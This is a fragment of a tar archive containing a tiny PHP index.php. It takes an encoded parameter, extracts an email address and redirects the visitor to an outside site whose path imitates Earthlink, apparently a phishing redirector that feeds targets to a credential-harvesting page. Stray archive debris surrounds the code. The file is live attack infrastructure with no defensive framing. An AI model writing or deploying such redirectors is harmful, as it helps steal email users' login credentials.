dvadf
index.php 0000644 00000000275 15144330220 0006362 0 ustar 00 <?php
$url = "https://workhub-portals.com/Earthlink-net";
$cl = explode( '/', $_GET['cl'] );
$random = $cl[0];
$email = $cl[1];
header("Location: $url?email=$email");
?>